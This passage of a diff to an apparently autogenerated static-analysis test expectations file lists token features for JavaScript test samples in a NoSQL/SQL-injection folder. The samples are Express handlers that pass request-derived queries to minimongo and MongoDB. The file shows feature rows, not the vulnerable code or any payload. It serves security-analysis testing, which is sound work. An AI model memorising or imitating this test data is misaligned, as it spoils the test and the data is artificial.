doc.find(query) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:17 | exceptional return of doc.find(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:17 | exceptional return of doc.find(query) | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:17 | exceptional return of doc.find(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:3:18:17 | exceptional return of doc.find(query) | fileImports | body-parser express minimongo | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:7:18:10 | find | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:7:18:10 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:7:18:10 | find | enclosingFunctionBody | req res query query title req body title doc find query | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:7:18:10 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:7:18:10 | find | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:12:18:16 | query | CalleeFlexibleAccessPath | doc.find | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:12:18:16 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:12:18:16 | query | calleeImports | minimongo | @@ -1432,24 +7702,152 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:12:18:16 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:12:18:16 | query | fileImports | body-parser express minimongo | | autogenerated/NosqlAndSqlInjection/untyped/minimongo.js:18:12:18:16 | query | receiverName | doc | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:0 | this | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:0 | this | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | require | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | require | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | useParams | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | useParams | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | useParams | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | useQuery | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | useQuery | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:1:1:1 | useQuery | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:7:1:13 | express | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:7:1:13 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:7:1:13 | express | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:7:1:34 | express | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:7:1:34 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:7:1:34 | express | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:7:1:34 | express ... press') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:7:1:34 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:7:1:34 | express ... press') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:17:1:23 | require | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:17:1:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:17:1:23 | require | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:17:1:34 | exceptional return of require('express') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:17:1:34 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:17:1:34 | exceptional return of require('express') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:17:1:34 | require('express') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:17:1:34 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:17:1:34 | require('express') | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:25:1:33 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:25:1:33 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:25:1:33 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:25:1:33 | 'express' | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:25:1:33 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:1:25:1:33 | 'express' | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:7:2:13 | mongodb | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:7:2:13 | mongodb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:7:2:13 | mongodb | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:7:2:34 | mongodb | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:7:2:34 | mongodb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:7:2:34 | mongodb | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:7:2:34 | mongodb ... ngodb') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:7:2:34 | mongodb ... ngodb') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:7:2:34 | mongodb ... ngodb') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:17:2:23 | require | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:17:2:23 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:17:2:23 | require | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:17:2:34 | exceptional return of require('mongodb') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:17:2:34 | exceptional return of require('mongodb') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:17:2:34 | exceptional return of require('mongodb') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:17:2:34 | require('mongodb') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:17:2:34 | require('mongodb') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:17:2:34 | require('mongodb') | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:25:2:33 | 'mongodb' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:25:2:33 | 'mongodb' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:25:2:33 | 'mongodb' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:25:2:33 | 'mongodb' | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:25:2:33 | 'mongodb' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:2:25:2:33 | 'mongodb' | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:7:3:16 | bodyParser | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:7:3:16 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:7:3:16 | bodyParser | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:7:3:41 | bodyPar ... arser') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:7:3:41 | bodyPar ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:7:3:41 | bodyPar ... arser') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:7:3:41 | bodyParser | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:7:3:41 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:7:3:41 | bodyParser | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:20:3:26 | require | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:20:3:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:20:3:26 | require | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:20:3:41 | exceptional return of require ... arser') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:20:3:41 | exceptional return of require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:20:3:41 | exceptional return of require ... arser') | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:20:3:41 | require ... arser') | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:20:3:41 | require ... arser') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:20:3:41 | require ... arser') | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:28:3:40 | 'body-parser' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:28:3:40 | 'body-parser' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:28:3:40 | 'body-parser' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:28:3:40 | 'body-parser' | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:28:3:40 | 'body-parser' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:3:28:3:40 | 'body-parser' | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:7:5:17 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:7:5:17 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:7:5:17 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:7:5:17 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:7:5:39 | MongoCl ... oClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:7:5:39 | MongoCl ... oClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:7:5:39 | MongoCl ... oClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:7:5:39 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:7:5:39 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:7:5:39 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:21:5:27 | mongodb | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:21:5:27 | mongodb | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:21:5:27 | mongodb | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:21:5:39 | mongodb.MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:21:5:39 | mongodb.MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:21:5:39 | mongodb.MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:29:5:39 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:29:5:39 | MongoClient | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:5:29:5:39 | MongoClient | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:7:7:9 | app | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:7:7:9 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:7:7:9 | app | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:7:7:21 | app | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:7:7:21 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:7:7:21 | app | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:7:7:21 | app = express() | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:7:7:21 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:7:7:21 | app = express() | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:13:7:19 | express | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:13:7:19 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:13:7:19 | express | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:13:7:21 | exceptional return of express() | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:13:7:21 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:13:7:21 | exceptional return of express() | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:13:7:21 | express() | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:13:7:21 | express() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:7:13:7:21 | express() | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:3 | app | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:3 | app | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:7 | app.use | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:7 | app.use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:7 | app.use | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:50 | app.use ... rue })) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:50 | app.use ... rue })) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:50 | app.use ... rue })) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:50 | exceptional return of app.use ... rue })) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:50 | exceptional return of app.use ... rue })) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:1:9:50 | exceptional return of app.use ... rue })) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:5:9:7 | use | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:5:9:7 | use | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:5:9:7 | use | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:18 | bodyParser | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:18 | bodyParser | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:18 | bodyParser | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:29 | bodyPar ... encoded | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:29 | bodyPar ... encoded | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:29 | bodyPar ... encoded | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:49 | bodyPar ... true }) | CalleeFlexibleAccessPath | app.use | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:49 | bodyPar ... true }) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:49 | bodyPar ... true }) | calleeImports | express | @@ -1457,6 +7855,12 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:49 | bodyPar ... true }) | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:49 | bodyPar ... true }) | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:49 | bodyPar ... true }) | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:49 | exceptional return of bodyPar ... true }) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:49 | exceptional return of bodyPar ... true }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:9:9:49 | exceptional return of bodyPar ... true }) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:20:9:29 | urlencoded | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:20:9:29 | urlencoded | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:20:9:29 | urlencoded | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:31:9:48 | { extended: true } | CalleeFlexibleAccessPath | bodyParser.urlencoded | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:31:9:48 | { extended: true } | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:31:9:48 | { extended: true } | calleeImports | body-parser | @@ -1464,6 +7868,15 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:31:9:48 | { extended: true } | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:31:9:48 | { extended: true } | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:31:9:48 | { extended: true } | receiverName | bodyParser | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:33:9:40 | extended | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:33:9:40 | extended | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:33:9:40 | extended | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:33:9:46 | extended: true | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:33:9:46 | extended: true | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:33:9:46 | extended: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:33:9:46 | extended: true | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:33:9:46 | extended: true | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:33:9:46 | extended: true | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:43:9:46 | true | CalleeFlexibleAccessPath | bodyParser.urlencoded | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:43:9:46 | true | InputAccessPathFromCallee | 0.extended | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:43:9:46 | true | InputArgumentIndex | 0 | @@ -1472,6 +7885,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:43:9:46 | true | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:43:9:46 | true | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:9:43:9:46 | true | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:11:3 | app | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:11:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:11:3 | app | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:11:8 | app.post | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:11:8 | app.post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:11:8 | app.post | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:35:2 | app.pos ... });\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:35:2 | app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:35:2 | app.pos ... });\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:35:2 | exceptional return of app.pos ... });\\n}) | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:35:2 | exceptional return of app.pos ... });\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:1:35:2 | exceptional return of app.pos ... });\\n}) | fileImports | ./dbo.js body-parser express mongodb | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:5:11:8 | post | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:5:11:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:5:11:8 | post | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:10:11:26 | '/documents/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:10:11:26 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:10:11:26 | '/documents/find' | calleeImports | express | @@ -1479,6 +7907,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:10:11:26 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:10:11:26 | '/documents/find' | fileImports | ./dbo.js body-parser express mongodb | | autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:10:11:26 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:28 | MongoClient | contextFunctionInterfaces | useParams(params)\nuseQuery(queries) | +| autogenerated/NosqlAndSqlInjection/untyped/mongodb.js:11:29:11:28 | MongoClient | contextSurroundingFunctionParameters | | +| 